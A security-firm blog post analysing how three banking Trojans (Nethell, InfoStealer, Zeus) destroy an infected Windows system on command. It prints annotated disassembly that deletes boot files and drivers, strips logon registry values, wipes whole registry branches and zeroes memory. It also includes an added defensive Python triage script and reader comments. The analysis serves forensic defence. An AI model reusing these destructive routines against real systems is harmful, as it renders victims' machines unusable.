
When a Bot master goes mad - Kill the OS

This time we take a close look at what can happen to an infected computer when the running bot receives a specific command to kill the operating system. Not every type of bot has this functionality, but banking Trojans usually do. We will take three examples (InfoStealer, Zeus/Zbot and Nethell/Ambler); these are the most common Trojans in whose binaries we have definitely found the malicious code responsible for the "execution" of Windows.


Nethell / Ambler:


Bot commands can often be spotted with the naked eye in the binary as plain strings, although it is not always as trivial as in the case of Nethell:




Looking for the subroutine that references the above strings, we arrive at the code that does the dirty job:


mov esi, offset aCNtdetect_com ; "C:\\NTDETECT.COM"
push edi
push esi
call GetFileAttributesA ; GetFileAttributesA("C:\\NTDETECT.COM")
mov edi, SetFileAttributesA
and al, 0F8h ; clear READONLY (1), HIDDEN (2) and SYSTEM (4) bits
push eax
push esi
call edi ; SetFileAttributesA("C:\\NTDETECT.COM", cleared attributes)
push esi
call DeleteFileA ; DeleteFileA("C:\\NTDETECT.COM")
mov esi, offset aCNtldr ; "C:\\ntldr" -- the same sequence follows for NTLDR


The code above deletes the files NTDETECT.COM and NTLDR; before deletion it clears the Hidden/System/Read-Only attribute bits, which would otherwise make DeleteFileA fail. The other bot command, KILLWINANDREBOOT, calls this same subroutine and then immediately tries to reboot the system.


InfoStealer:


InfoStealer's method is undoubtedly effective:


push offset aDrivers_sys ; "\\drivers\\*.sys"
push eax ; Dest
call ds:wcscat ; FileName = "<system dir>\\drivers\\*.sys"
push 1 ; hFindFile
push offset delete ; int -- callback applied to every match
lea eax, [ebp+FileName]
push 98967Fh ; int
push eax ; lpFileName
call recursive_findfile ; recursive_findfile(FileName, 98967Fh, delete, 1)
add esp, 18h ; cdecl clean-up: 2 args for wcscat + 4 for recursive_findfile
call reboot


The subroutine tries to delete each driver (*.sys) within the System32 directory. The first attempt is a normal delete; if that fails, it calls the MoveFileEx API with the MOVEFILE_DELAY_UNTIL_REBOOT flag, which deletes the file at the next startup.


InfoStealer also removes the registry values needed to create a logon session:


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell = Explorer.exe
UIHost = logonui.exe
HKLM\SYSTEM\CurrentControlSet\Services\DcomLaunch\Parameters
ServiceDll = rpcss.dll
HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\Parameters
ServiceDll = rpcss.dll


Zeus / Zbot:


Last but not least, here comes the old Zeus. Although it requires the least code to execute, it is nevertheless the most aggressive and robust:


push eax ; subkey
push 80000001h ; HKEY_CURRENT_USER
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+50h] ; subkey string taken from the config buffer
mov esi, 80000002h ; HKEY_LOCAL_MACHINE
push esi
call ds:SHDeleteKeyA
mov eax, ds:buffer
push dword ptr [eax+54h] ; second subkey string from the config buffer
push esi
call ds:SHDeleteKeyA
push 3E8h ; 1000 ms
call ds:Sleep
xor eax, eax
push eax
push eax
push eax
push eax
mov eax, ds:buffer
push 0Eh ; command 0x0E
push dword ptr [eax+30h] ; pipe handle/name from the config buffer
call write_read_namedpipe


It "just" deletes two kinds of registry entries, but these include WHOLE branches:


HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE\software
HKEY_LOCAL_MACHINE\system


The execution flow does not end here. After the deletion is finished, it sends the 0E command to its pipe server, where the following code starts zeroing the bytes of the virtual memory (4 GB):


push 8007h ; SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOALIGNMENTFAULTEXCEPT | SEM_NOOPENFILEERRORBOX
call eax ; <--- SetErrorMode, to ignore everything
xor eax, eax
mov [eax], eax ; first write goes to address 0
xor eax, eax
; from address 0x00000000 - 0xFFFFFFFF
loc_1: mov byte ptr [eax], 0 ; fill the memory with zeros
inc eax
jmp short loc_1 ; never terminates on its own


Invoking Zeus' method in our test environment resulted in a BSOD (Blue Screen of Death).
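As an added example that is not part of the original post, the following Python triage checks an offline snapshot of an infected machine for the evidence each of the three methods leaves behind: the missing boot files (Nethell), the removed logon values and the boot-time driver deletions queued by MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT (InfoStealer), and empty HKLM\SOFTWARE and HKLM\SYSTEM branches (Zeus). The snapshot format (a set of paths plus a flat dict of registry values) and the sample data are constructed here; the PendingFileRenameOperations layout is Windows' documented behaviour for delayed MoveFileEx calls, not something shown on this page.

```python
# Offline triage for the three "kill the OS" patterns above (added example).
# Input: the set of paths present on a mounted image plus a flat dict of
# registry values {key path: {value name: data}}; both are constructed here.
from __future__ import annotations

BOOT_FILES = {"C:\\NTDETECT.COM", "C:\\ntldr"}  # Nethell deletes these
WINLOGON = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
SERVICES = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
LOGON_VALUES = {  # InfoStealer removes these
    (WINLOGON, "Shell"): "Explorer.exe",
    (WINLOGON, "UIHost"): "logonui.exe",
    (SERVICES + "\\DcomLaunch\\Parameters", "ServiceDll"): "rpcss.dll",
    (SERVICES + "\\RpcSs\\Parameters", "ServiceDll"): "rpcss.dll",
}
# MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT records the request in this
# REG_MULTI_SZ as (source, destination) pairs; an empty destination = delete.
PFRO_KEY = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager"
PFRO_VALUE = "PendingFileRenameOperations"

def pending_deletes(registry: dict) -> list[str]:
    """Paths queued for deletion at the next boot."""
    ops = registry.get(PFRO_KEY, {}).get(PFRO_VALUE, [])
    return [src for src, dst in zip(ops[0::2], ops[1::2]) if dst == ""]

def triage(files: set[str], registry: dict) -> dict[str, list[str]]:
    """Map each technique to the evidence found for it in the snapshot."""
    found: dict[str, list[str]] = {"nethell": [], "infostealer": [], "zeus": []}
    for f in sorted(BOOT_FILES - files):
        found["nethell"].append(f"boot file missing: {f}")
    for (key, name), expected in LOGON_VALUES.items():
        if registry.get(key, {}).get(name) != expected:
            found["infostealer"].append(f"logon value missing: {key}\\{name}")
    for path in pending_deletes(registry):
        if "\\drivers\\" in path.lower() and path.lower().endswith(".sys"):
            found["infostealer"].append(f"driver queued for delete: {path}")
    for branch in ("HKLM\\SOFTWARE", "HKLM\\SYSTEM"):
        if not any(k.startswith(branch + "\\") for k in registry):
            found["zeus"].append(f"branch wiped: {branch}")
    return found


# Constructed snapshot of an image after the InfoStealer routine has run.
SAMPLE_FILES = {"C:\\NTDETECT.COM", "C:\\ntldr", "C:\\WINDOWS\\system32\\ntoskrnl.exe"}
SAMPLE_REGISTRY = {
    WINLOGON: {"Userinit": "C:\\WINDOWS\\system32\\userinit.exe,"},
    SERVICES + "\\RpcSs\\Parameters": {},
    PFRO_KEY: {PFRO_VALUE: ["\\??\\C:\\WINDOWS\\system32\\drivers\\afd.sys", "",
                            "\\??\\C:\\WINDOWS\\system32\\drivers\\tcpip.sys", ""]},
}
```

Because Zeus wipes the whole HKLM\SOFTWARE and HKLM\SYSTEM branches, the InfoStealer checks fire as well on a Zeus-killed image; the "branch wiped" finding is what distinguishes the two.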


What could be the attacker's intention in taking the victim's computer offline? To disappear and hide all tracks, making further analysis harder? In the case of banking Trojans, obviously not. As we have seen, none of these methods leads to significant data loss; the Trojan binaries are not removed, nor are the registry startup entries. More probably, the point for a phisher is to gain time: taking the victim away from the Internet connection before the unwanted money transfer is realized and further action can be taken.

Of course, this information is not meant to give anyone tips on how to kill Windows; rather, we hope it may help to clear up some mysterious case and assist forensic analysis.


Jozsef Gegeny
S21sec e-crime


4 comments:

Anonymous said...

A security expert could have been able to enter the network and blow the trigger in order both to disable the botnet and to alert the users, even if in the hard way.

Anonymous said...

Hahahahaha! This is why I like Linux. Viruses can't modify critical system files unless the user stupidly runs as root.

Why the hell do people use Windows when there's no decent file permissions system in place? I think one reason why Windows has over 50,000 buggers is because it's just too easy to break.

I mean, all they need to do is apply a single byte to the file and use an octet-type system to define read/write/execute permissions for each individual file.

Anonymous said...

This comment has been removed by a blog administrator.

Charles said...

This is gorgeous!





© Copyright S21sec 2013 - All rights reserved

